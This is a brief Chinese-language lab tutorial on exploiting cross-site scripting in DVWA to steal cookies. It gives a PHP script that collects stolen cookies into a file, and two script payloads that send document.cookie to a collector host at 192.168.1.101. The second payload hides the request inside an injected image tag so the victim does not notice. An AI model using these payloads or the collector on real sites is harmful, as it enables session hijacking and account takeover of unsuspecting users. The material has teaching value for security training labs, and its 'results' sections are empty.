XSS漏洞利用——获取cookie

实验环境：DVWA

实验步骤：

一、在服务器创建一个1.php文件获取cookie值，并将cookie值写入1.txt中

php代码如下：

<?php
 $file=fopen("1.txt","a");
 if($_GET['cookie']){
  $cookie=$_GET['cookie'];
  fputs($file,"$cookie\r\n");
 }
?>

二、构造url，当用户打开url时自动将其本地cookie发送到1.txt中

三、将代码和本地cookie进行拼接

代码如下：

<script>document.location='http://192.168.1.101/xss/1.php?cookie='+document.cookie;</script>

四、打开DVWA（选择低级别）执行代码，结果如下：

上述代码会将用户访问的页面跳转到空白页，太明显，所以可将代码插入到图片标签中

代码如下：

<script>document.body.innerHTML+="<img src='http://192.168.1.101/xss/1.php?cookie="+document.cookie+"'>";</script>

结果如下：